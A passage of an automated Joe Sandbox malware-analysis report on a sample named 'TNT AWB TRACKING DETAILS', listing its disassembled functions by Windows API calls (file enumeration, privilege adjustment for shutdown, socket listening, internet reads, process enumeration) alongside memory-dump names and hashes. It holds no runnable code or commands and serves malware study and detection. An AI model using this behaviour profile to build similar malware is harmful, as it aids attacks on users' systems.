                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F23BEA
                                                    • FindClose.KERNEL32(00000000), ref: 00F23C01
                                                    • FindClose.KERNEL32(00000000), ref: 00F23C0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 2649000838-1173974218
                                                    • Opcode ID: efed34373b3a70ae3596d1ea2d58f1cb3606c28baa212087bf9f19634ded1226
                                                    • Instruction ID: d5fb6f4d0b2644583931431a19a3cb95a6362a0e692a27ed9afbee60fefb0daa
                                                    • Opcode Fuzzy Hash: efed34373b3a70ae3596d1ea2d58f1cb3606c28baa212087bf9f19634ded1226
                                                    • Instruction Fuzzy Hash: 6931B0710083959BC300EF24D991DAFB7E8AEA5310F401D2DF8E5A2191EB35DA0EDB53
                                                    Function 00F251BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1882B
                                                      • Part of subcall function 00F187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F18858
                                                      • Part of subcall function 00F187E1: GetLastError.KERNEL32 ref: 00F18865
                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00F251F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                    • String ID: $@$SeShutdownPrivilege
                                                    • API String ID: 2234035333-194228
                                                    • Opcode ID: 874f36feab9ed0b7cf71afbe7160d9743d9ed8fb6b18244b60934f49830a488d
                                                    • Instruction ID: 5026eac0291a6e63f5fce4e4f69c9a3538ff93fc6850b708ce06869f752a84ba
                                                    • Opcode Fuzzy Hash: 874f36feab9ed0b7cf71afbe7160d9743d9ed8fb6b18244b60934f49830a488d
                                                    • Instruction Fuzzy Hash: 61017B36B91635ABF7282268BC8BFBB7258EB15B60F240421FD07E20C2DA745C01B190
                                                    Function 00F36283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 00F362DC
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F362EB
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F36307
                                                    • listen.WSOCK32(00000000,00000005), ref: 00F36316
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F36330
                                                    • closesocket.WSOCK32(00000000), ref: 00F36344
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                    • String ID:
                                                    • API String ID: 1279440585-0
                                                    • Opcode ID: 631122b776d2b58d7ad8334f921c9672d75d96b78cf7816e339b3aed743d1b83
                                                    • Instruction ID: 521232559b28256a1032463dd07d98364a0f1afe719b93518a0b0ac32d5051ab
                                                    • Opcode Fuzzy Hash: 631122b776d2b58d7ad8334f921c9672d75d96b78cf7816e339b3aed743d1b83
                                                    • Instruction Fuzzy Hash: 6E21BB35600204AFCB10AF64CD49B6EB7E9EF49724F148168E81AE7392CB70AC05EB51
                                                    Function 00ED5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                    • _memmove.LIBCMT ref: 00F10258
                                                    • _memmove.LIBCMT ref: 00F1036D
                                                    • _memmove.LIBCMT ref: 00F10414
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1300846289-0
                                                    • Opcode ID: f3594bfb192e272ef92aaffe8944d8dc8435092632a90262669f2acb3c94d5b1
                                                    • Instruction ID: 3651767b0f4dec64c9cd0c0756fc226933af404b7926d245896149a1f3d025a7
                                                    • Opcode Fuzzy Hash: f3594bfb192e272ef92aaffe8944d8dc8435092632a90262669f2acb3c94d5b1
                                                    • Instruction Fuzzy Hash: DC02D071A00209DBCF04DF64D981AAEBBF5FF44310F14806AE80AEB355EB75D991DB91
                                                    Function 00EC1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00EC19FA
                                                    • GetSysColor.USER32(0000000F), ref: 00EC1A4E
                                                    • SetBkColor.GDI32(?,00000000), ref: 00EC1A61
                                                      • Part of subcall function 00EC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00EC12D8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ColorProc$LongWindow
                                                    • String ID:
                                                    • API String ID: 3744519093-0
                                                    • Opcode ID: 60115f0ca3b5a12b7a7b5007d2badc17267de45e27fc46f887c274056398dabc
                                                    • Instruction ID: 9b8805347d9570e476ff86a038dab066bac2aab767787f0b2401fa487abd7fc6
                                                    • Opcode Fuzzy Hash: 60115f0ca3b5a12b7a7b5007d2badc17267de45e27fc46f887c274056398dabc
                                                    • Instruction Fuzzy Hash: BEA12A71106548BAE628AA298E44FFF399CDB83349B14315EF613F5193CB27DD03A6B1
                                                    Function 00F2BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F2BCE6
                                                    • _wcscmp.LIBCMT ref: 00F2BD16
                                                    • _wcscmp.LIBCMT ref: 00F2BD2B
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F2BD3C
                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F2BD6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 2387731787-0
                                                    • Opcode ID: 45d9365e9e2ccf46c76c0e0f8dcc902ca13c7bea370d78f724aa9eaff1a466f0
                                                    • Instruction ID: c024eacb3e62cba533261844786b90375c7a263da07d863b965019abeaa41b4e
                                                    • Opcode Fuzzy Hash: 45d9365e9e2ccf46c76c0e0f8dcc902ca13c7bea370d78f724aa9eaff1a466f0
                                                    • Instruction Fuzzy Hash: B151AC36A046129FC718DF28D890EEAB3E8FF49320F50461DE95A973A1DB30ED05DB91
                                                    Function 00F36747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F37D8B: inet_addr.WSOCK32(00000000), ref: 00F37DB6
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00F3679E
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F367C7
                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00F36800
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F3680D
                                                    • closesocket.WSOCK32(00000000), ref: 00F36821
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 99427753-0
                                                    • Opcode ID: 43da73eedf4a4a175dc84814773aaa93f49d390499e2eff5bac8eea55b4771e1
                                                    • Instruction ID: 8febbff9f0a160552c3bd6da97dcd08f996704b3ed7df552e749542b3c92554a
                                                    • Opcode Fuzzy Hash: 43da73eedf4a4a175dc84814773aaa93f49d390499e2eff5bac8eea55b4771e1
                                                    • Instruction Fuzzy Hash: 2D41C376A00204AFDB10AF248E86F6E77E8AF49724F44845CFD1AAB3D3CA759D019791
                                                    Function 00F45376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 17f568b93485a041c62375313d1ae0547db1ab742cd1547b59da617e98776c7c
                                                    • Instruction ID: c474773421f239bfbd5e73ab02d9c970a9ace2a4c6db78e3b78dd568b7b25d45
                                                    • Opcode Fuzzy Hash: 17f568b93485a041c62375313d1ae0547db1ab742cd1547b59da617e98776c7c
                                                    • Instruction Fuzzy Hash: EC1108327005146FEB206F26DC44B6F7F99EF45BA0B04402CFC45D7242CB70DC029690
                                                    Function 00F180A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F180C0
                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F180CA
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F180D9
                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F180E0
                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F180F6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: bca4e3fa84dfcdc3ad84283e5a5059df6c92555a88d8785ca7867a3235077634
                                                    • Instruction ID: 6ef2b1c2a79db2b8d8165dd32fa509b138b3090928a3342be8b67deea1388955
                                                    • Opcode Fuzzy Hash: bca4e3fa84dfcdc3ad84283e5a5059df6c92555a88d8785ca7867a3235077634
                                                    • Instruction Fuzzy Hash: F1F06835240208BFE7100FA5DC8DEA73BACEF867A5B000025F949D6151CB619C46EA60
                                                    Function 00EC4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC4AD0), ref: 00EC4B45
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EC4B57
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                    • API String ID: 2574300362-192647395
                                                    • Opcode ID: a2822527ce1a21daf0561409b01dcc9c0cd05a83b00aa7cdbf23e18075947262
                                                    • Instruction ID: f4dfcd288449cdd9b8a574e68d11d962d6f9222f45173b88d7832b5692a182a7
                                                    • Opcode Fuzzy Hash: a2822527ce1a21daf0561409b01dcc9c0cd05a83b00aa7cdbf23e18075947262
                                                    • Instruction Fuzzy Hash: 99D0C2B4A00B17CFC7208F31D928F4676E4AF82388B10883E9889D2190D670D884D614
                                                    Function 00F3EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00F3EE3D
                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00F3EE4B
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00F3EF0B
                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F3EF1A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                    • String ID:
                                                    • API String ID: 2576544623-0
                                                    • Opcode ID: a00465d31c6821ee7b50e2e56e6127cda2e087e8af877aed6a4f8c8301db754d
                                                    • Instruction ID: 415f8191fa6eacb3825bd42aaf4df92eba4755c26e214988af139f9ba97b6155
                                                    • Opcode Fuzzy Hash: a00465d31c6821ee7b50e2e56e6127cda2e087e8af877aed6a4f8c8301db754d
                                                    • Instruction Fuzzy Hash: BB5190715043049FD310EF20CD85F6BB7E8EF94710F10582DF995A72A1EB71A909CB92
                                                    Function 00F1E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F1E628
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ($|
                                                    • API String ID: 1659193697-1631851259
                                                    • Opcode ID: 232c9859cc451a586a01b46c4966bafe3cf4993441fa68a5ccb071a2f7c722b4
                                                    • Instruction ID: 8c90db8025071f269fdc17880de39d05e3eb5dbcb963fe7137fce54e155c77bc
                                                    • Opcode Fuzzy Hash: 232c9859cc451a586a01b46c4966bafe3cf4993441fa68a5ccb071a2f7c722b4
                                                    • Instruction Fuzzy Hash: 5B322775A007059FD728CF19C481AAAB7F1FF48320B15C56EE89ADB3A1E770E981CB40
                                                    Function 00F322EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F3180A,00000000), ref: 00F323E1
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F32418
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: e586b6c6bb4b9df02e632128b8395db3231b542aec4dd0097d8500983cceffdf
                                                    • Instruction ID: 0d9e71b0cf03356ecf6502d6678b042a16b3566b3fe7c052842afa258f350c40
                                                    • Opcode Fuzzy Hash: e586b6c6bb4b9df02e632128b8395db3231b542aec4dd0097d8500983cceffdf
                                                    • Instruction Fuzzy Hash: 8241F372904209FFEB50DE95DC81FBFB7BCEB40734F10402AFA05A6141EA759E41B660
                                                    Function 00F2B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2B40B
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00F2B465
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00F2B4B2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: efe819e65d5e31edfac5f0ae9b30639590f8c1d702cb298633efbb5a53f88566
                                                    • Instruction ID: 94cc3913ce91b45c369120f07e8d88da17fd66ff1b26d82489a6836274c8fca3
                                                    • Opcode Fuzzy Hash: efe819e65d5e31edfac5f0ae9b30639590f8c1d702cb298633efbb5a53f88566
                                                    • Instruction Fuzzy Hash: 54215135A00518DFCB00EF55D884EEDBBB8FF49314F1480A9E905AB351CB319955DB51
                                                    Function 00F187E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EE0DB6: std::exception::exception.LIBCMT ref: 00EE0DEC
                                                      • Part of subcall function 00EE0DB6: __CxxThrowException@8.LIBCMT ref: 00EE0E01
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1882B
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F18858
                                                    • GetLastError.KERNEL32 ref: 00F18865
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: ad7407252228b1ac8c118c66795a87e31c461a862f1893bd30b3cbf0edd5cc1a
                                                    • Instruction ID: 4ed624278bdb46f0ecdcfae9a0c9366d09a0f94f3b2b1c027f6083b29123c4e8
                                                    • Opcode Fuzzy Hash: ad7407252228b1ac8c118c66795a87e31c461a862f1893bd30b3cbf0edd5cc1a
                                                    • Instruction Fuzzy Hash: 1F11BFB2804209AFE718DFA4DC85D6BB7F8EB45320B20852EF45593201EB70BC818B60
                                                    Function 00F1874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00F18774
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F1878B
                                                    • FreeSid.ADVAPI32(?), ref: 00F1879B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
